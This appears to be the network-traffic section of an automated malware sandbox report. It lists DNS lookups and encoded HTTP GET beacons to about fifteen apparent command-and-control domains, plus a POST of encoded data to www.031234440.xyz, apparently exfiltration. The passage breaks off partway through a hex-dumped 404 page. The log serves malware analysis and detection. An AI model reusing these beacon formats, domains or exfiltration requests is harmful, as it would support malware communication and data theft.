Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /n6q4/?26NtD=ZPldbrB0ORCTO&wdo8x=n+Cyrj9OcMUOWbDH4MuoLjHhGBDUooIVzDhzjZWQ23L4TEIxqC5WFJ8UBoGhNZI40hZuAzBYhUyOQRAQW66cHjD60D2c44oPjyev5C6vmdix1weqOmxzTu0= HTTP/1.1Host: www.travel-cure.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.7) Gecko/20150824 Firefox/31.9 PaleMoon/25.7.0
Source: global traffic	HTTP traffic detected: GET /in0f/?wdo8x=ZIcYwRJGDg0fAU3doFx/zb4tZxryYxmIoxMrYKEAbV3UzVU0eLbtrG9j/yyRwtiJkao9JDQIroByLzTLde3aJW9S2p3hSqZBFU3u360B99XurD1/FMJsZ58=&26NtD=ZPldbrB0ORCTO HTTP/1.1Host: www.031234440.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.7) Gecko/20150824 Firefox/31.9 PaleMoon/25.7.0
Source: global traffic	HTTP traffic detected: GET /qz1f/?26NtD=ZPldbrB0ORCTO&wdo8x=R3POWldBJ0B8vf6gfbM8JLvlRNzJM/CgESXua1i2Y/vUGvkPMy2cYsuNKIu+l5r0WZkM9nVgDAganTPME1x8pIg3x1Se+aqJLQm0/RN9k6UTL1VkQaCJ/DM= HTTP/1.1Host: www.balivegasbaru2.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.7) Gecko/20150824 Firefox/31.9 PaleMoon/25.7.0
Source: global traffic	HTTP traffic detected: GET /cz90/?wdo8x=6rZCSmlHkF5ntp6UChn9ksuNhrxMjWWd9IQfXnguWdXYPTQlp2yvOR6eDS19UPjajIiXG5+s4R+kHR0tPRjNqp5wSQkqXMuVr6X0K2l0Ju/oZRuoiLeI3fw=&26NtD=ZPldbrB0ORCTO HTTP/1.1Host: www.boldhozons.websiteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.7) Gecko/20150824 Firefox/31.9 PaleMoon/25.7.0
Source: global traffic	HTTP traffic detected: GET /6q5z/?26NtD=ZPldbrB0ORCTO&wdo8x=CDJ3gk7iYZ8ooESChvzGU4uHJCMYy+vi30lwOE1UbyGwM0FL4UCTZQfw4qmEQlf//7jTzNtrG+yeeEg9XY+ji6wzIHmdwsta4bE9Tij9Wnjp9+H0BDQ00AQ= HTTP/1.1Host: www.allenamento.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.7) Gecko/20150824 Firefox/31.9 PaleMoon/25.7.0
Source: global traffic	HTTP traffic detected: GET /yblm/?wdo8x=NDRW5tWQOhzBq7IA53mHXB4mCkR10O+3csKbZ9/VMmMSTBmREEIqQnj7l90IfWtBEMJqzMxHloBONied3nVTplKF6z/rAP0zVpuUSDh6APcCKDQdJ1JrgCQ=&26NtD=ZPldbrB0ORCTO HTTP/1.1Host: www.caral.tokyoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.7) Gecko/20150824 Firefox/31.9 PaleMoon/25.7.0
Source: global traffic	HTTP traffic detected: GET /48bq/?26NtD=ZPldbrB0ORCTO&wdo8x=pv3DUJe9yPth5S00/ah9/bEmDyU4ctJg85vwg8BMxTkp3aaU2xC7kNpotxOlvsK6c8UP176upV9MEeNzbUWUAPZEMCU/IM/+W9t8mU0ezYbHkBWVG3xo2q0= HTTP/1.1Host: www.fz977.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.7) Gecko/20150824 Firefox/31.9 PaleMoon/25.7.0
Source: global traffic	HTTP traffic detected: GET /1785/?wdo8x=it+xGm5kt4ps4kUhM4EugoOlJoCkWs34PccVcTF5eINqYc/O0sbSpsio0UDZP5+eohjNZXpsQgscF6TzNAplZVTop0Sih9RAli1ZJ3LJi5OF3adLu/2qkEQ=&26NtD=ZPldbrB0ORCTO HTTP/1.1Host: www.grcgrg.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.7) Gecko/20150824 Firefox/31.9 PaleMoon/25.7.0
Source: global traffic	HTTP traffic detected: GET /cw9y/?26NtD=ZPldbrB0ORCTO&wdo8x=SacwBfKeLrekrZeLDmW53fDba0pSpZuYXZuKDHacSTLS7n4XhBMeIk/u1WsdzCmNISlctRFhQ7tGCEQRNfWtWU6FL1Hg0dHLHYWxR/MtmxifFdXxwFIJBAk= HTTP/1.1Host: www.inno.financialAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.7) Gecko/20150824 Firefox/31.9 PaleMoon/25.7.0
Source: global traffic	HTTP traffic detected: GET /gc5e/?wdo8x=gq7XrXmYs0fvWVveamrNoa0nIJ20RssX/crEf/emsJUiSDiCD79m6nUV04I0jWi7u85W4kkKis3JFUsK6ila6wS/yCTBEzLXvLhiMMhPFvmqdbv2oVZCvXY=&26NtD=ZPldbrB0ORCTO HTTP/1.1Host: www.gnolls.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.7) Gecko/20150824 Firefox/31.9 PaleMoon/25.7.0
Source: global traffic	HTTP traffic detected: GET /ni99/?26NtD=ZPldbrB0ORCTO&wdo8x=4GVs/nYgtZtLwEpZy7uwdbL0GYE17P7OGfiZoglhfzYzE4CU9dtL6z/226Kc7xwLk6Uw1XN8jtTeSms3icnthVU1fPoT/kVpMD3NKAOHQrUaeazLt4yVois= HTTP/1.1Host: www.mercadoacheaqui.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.7) Gecko/20150824 Firefox/31.9 PaleMoon/25.7.0
Source: global traffic	HTTP traffic detected: GET /cw9y/?wdo8x=SacwBfKeLrekrZeLDmW53fDba0pSpZuYXZuKDHacSTLS7n4XhBMeIk/u1WsdzCmNISlctRFhQ7tGCEQRNfWtWU6FL1Hg0dHLHYWxR/MtmxifFdXxwFIJBAk=&26NtD=ZPldbrB0ORCTO HTTP/1.1Host: www.inno.financialAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.7) Gecko/20150824 Firefox/31.9 PaleMoon/25.7.0
Source: global traffic	HTTP traffic detected: GET /hzjg/?26NtD=ZPldbrB0ORCTO&wdo8x=JM+spcZ+8KKknY6V8Rj+/pD5zFm4RnTnZNOvAwvYRq4bYtMCWKtHUO/1Ii5giDcP6FL8pjCGTrrBoH970pHxhIy5EA6ZmamzWovc34NNBOesZretnjyCH5w= HTTP/1.1Host: www.antobloom.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.7) Gecko/20150824 Firefox/31.9 PaleMoon/25.7.0
Source: global traffic	HTTP traffic detected: GET /kf4a/?wdo8x=JRaVnR84Rit5ZUveS5xgfjMw5dsxqAvYVufdJJyQ0WtPsxsZdHoOsf37V0Mmqez1hk3vmJnePxaN3D83MvhVbl0IoMgMp2HD7Ou3SdH6rUImIIKNrIAhEps=&26NtD=ZPldbrB0ORCTO HTTP/1.1Host: www.crazymeme.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.7) Gecko/20150824 Firefox/31.9 PaleMoon/25.7.0
Source: global traffic	HTTP traffic detected: GET /lqwe/?wdo8x=vJot/NNyz8i0+xGmSzyung19ZvaNSA4DGO9mJpOEO7ng80AgWKkXaUUIDT/twVD2JnANe1AmwdEtR2OS/mEl9mJQMiLeKwukLSKUzTHNU30WjYW3l3M8Y+Q=&26NtD=ZPldbrB0ORCTO HTTP/1.1Host: www.jeanandolive.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.7) Gecko/20150824 Firefox/31.9 PaleMoon/25.7.0
Source: global traffic	HTTP traffic detected: GET /cjnc/?wdo8x=GPvxl1z2a274aE2q2ikaaoMQhigcJmBAPPyV9V8DDwvKcihtvSw4jzyai6FXETA3HMwVOBD1vqD0OWzAu3mTOKiZtsFmZoOM5xtk83EjqI4D2uL1vu1lpNw=&26NtD=ZPldbrB0ORCTO HTTP/1.1Host: www.shibfestival.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.7) Gecko/20150824 Firefox/31.9 PaleMoon/25.7.0
Source: global traffic	HTTP traffic detected: GET /n6q4/?26NtD=ZPldbrB0ORCTO&wdo8x=n+Cyrj9OcMUOWbDH4MuoLjHhGBDUooIVzDhzjZWQ23L4TEIxqC5WFJ8UBoGhNZI40hZuAzBYhUyOQRAQW66cHjD60D2c44oPjyev5C6vmdix1weqOmxzTu0= HTTP/1.1Host: www.travel-cure.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.7) Gecko/20150824 Firefox/31.9 PaleMoon/25.7.0

Source: global traffic	DNS traffic detected: DNS query: www.travel-cure.sbs
Source: global traffic	DNS traffic detected: DNS query: www.031234440.xyz
Source: global traffic	DNS traffic detected: DNS query: www.balivegasbaru2.xyz
Source: global traffic	DNS traffic detected: DNS query: www.boldhozons.website
Source: global traffic	DNS traffic detected: DNS query: www.allenamento.xyz
Source: global traffic	DNS traffic detected: DNS query: www.caral.tokyo
Source: global traffic	DNS traffic detected: DNS query: www.fz977.xyz
Source: global traffic	DNS traffic detected: DNS query: www.grcgrg.net
Source: global traffic	DNS traffic detected: DNS query: www.inno.financial
Source: global traffic	DNS traffic detected: DNS query: www.gnolls.xyz
Source: global traffic	DNS traffic detected: DNS query: www.mercadoacheaqui.shop
Source: global traffic	DNS traffic detected: DNS query: www.antobloom.xyz
Source: global traffic	DNS traffic detected: DNS query: www.crazymeme.xyz
Source: global traffic	DNS traffic detected: DNS query: www.jeanandolive.net
Source: global traffic	DNS traffic detected: DNS query: www.shibfestival.xyz

Source: unknown

HTTP traffic detected: POST /in0f/ HTTP/1.1Host: www.031234440.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usAccept-Encoding: gzip, deflate, brConnection: closeContent-Length: 202Cache-Control: no-cacheContent-Type: application/x-www-form-urlencodedOrigin: http://www.031234440.xyzReferer: http://www.031234440.xyz/in0f/User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.7) Gecko/20150824 Firefox/31.9 PaleMoon/25.7.0Data Raw: 77 64 6f 38 78 3d 55 4b 30 34 7a 6d 64 47 51 58 78 4f 53 67 62 47 6e 6b 70 6e 32 4a 6f 37 57 41 71 7a 58 78 72 36 76 33 77 38 44 36 6f 42 56 68 7a 65 72 79 41 46 59 70 2f 5a 76 55 6c 63 39 7a 36 68 36 70 57 41 73 61 55 65 4a 41 42 57 67 61 6c 7a 61 77 44 50 66 63 4c 44 54 44 46 4e 34 36 37 68 54 49 56 41 4b 32 50 6d 2f 36 52 51 38 2f 6a 44 6e 67 63 2f 46 73 70 55 49 72 2f 6b 43 7a 74 62 66 65 2f 59 69 6b 43 31 41 67 58 42 32 2f 6e 51 39 7a 44 42 69 6d 6a 78 46 42 57 34 4a 63 6d 2f 6a 39 41 62 4d 73 56 4f 64 62 37 54 47 77 71 74 50 38 45 42 4f 65 73 4b 61 6f 63 43 32 4c 35 79 54 65 6d 6a 6f 77 3d 3d Data Ascii: wdo8x=UK04zmdGQXxOSgbGnkpn2Jo7WAqzXxr6v3w8D6oBVhzeryAFYp/ZvUlc9z6h6pWAsaUeJABWgalzawDPfcLDTDFN467hTIVAK2Pm/6RQ8/jDngc/FspUIr/kCztbfe/YikC1AgXB2/nQ9zDBimjxFBW4Jcm/j9AbMsVOdb7TGwqtP8EBOesKaocC2L5yTemjow==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Feb 2025 11:22:11 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Feb 2025 11:22:13 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Feb 2025 11:22:16 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Feb 2025 11:22:19 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Feb 2025 11:22:25 GMTTransfer-Encoding: chunkedConnection: closeStrict-Transport-Security: max-age=2592000Access-Control-Allow-Origin: http://www.balivegasbaru2.xyzAccess-Control-Allow-Credentials: truecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ilsov4uv37mn0%2Bxzz1%2Br9MwtXVXKyO0PkiRBHK%2FeDNZXi7MjvH%2BOFVBfoCWgzlUdh4eSn%2F3rIS%2FfeAI8YwXDrCkSp7A56AFsBwGOWpAD%2BEAgOG0uLyQNWDJX7OZSfGANhCF8PPLShmhp"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 911cae20cbea41e1-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1653&min_rtt=1653&rtt_var=826&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=717&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Feb 2025 11:22:27 GMTTransfer-Encoding: chunkedConnection: closeStrict-Transport-Security: max-age=2592000Access-Control-Allow-Origin: http://www.balivegasbaru2.xyzAccess-Control-Allow-Credentials: truecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YSkfNJkvyW9dlSA%2BH5D0w6NkrQCga8%2BnpA4O9T0Lg1LIqgfQSsdh%2FjfL7qHwipaZMCN1T20m1iCGIQl%2BiqV%2Fl4jul9xkerPF5guGZhGz89hvaJVUD6PnqftfDzQubtX7KVBel5F%2FZlCk"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 911cae30cf48c40c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1480&min_rtt=1480&rtt_var=740&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=737&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Feb 2025 11:22:30 GMTTransfer-Encoding: chunkedConnection: closeStrict-Transport-Security: max-age=2592000Access-Control-Allow-Origin: http://www.balivegasbaru2.xyzAccess-Control-Allow-Credentials: truecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4W43sNTrFjxGkLDXy33zOSJqJQdGF1ma4FfX2s5uYDUN4A29IpSeYq1OJCmPOb7T4ng1wEycMrMI3es9bEUfGH8IvibCfg8I7QsZbz8axBSIpTWwtJkNVfvP9CzGw1ndQfB%2FDu1%2FCymf"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 911cae40defbef9f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1762&min_rtt=1762&rtt_var=881&sent=5&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10819&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Feb 2025 11:22:32 GMTTransfer-Encoding: chunkedConnection: closeStrict-Transport-Security: max-age=2592000cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xWgYwfIL3hTagxQQVfXBVoLlg5019FnyRiuqF%2FUEyjHr43sPM%2B49sYQtWTK9ziwVBNlC4APPDkFkLn3jtiDHx4qSYJzwidWO3Qw2PeEjyZ7%2FLOvVl2gzXvmj%2F0dcHw6z3rInQ0qkQIYN"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 911cae517ab9c466-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1500&min_rtt=1500&rtt_var=750&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=445&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Feb 2025 11:22:38 GMTServer: ApacheContent-Length: 13840Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 0a 2e 72 69 67 68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 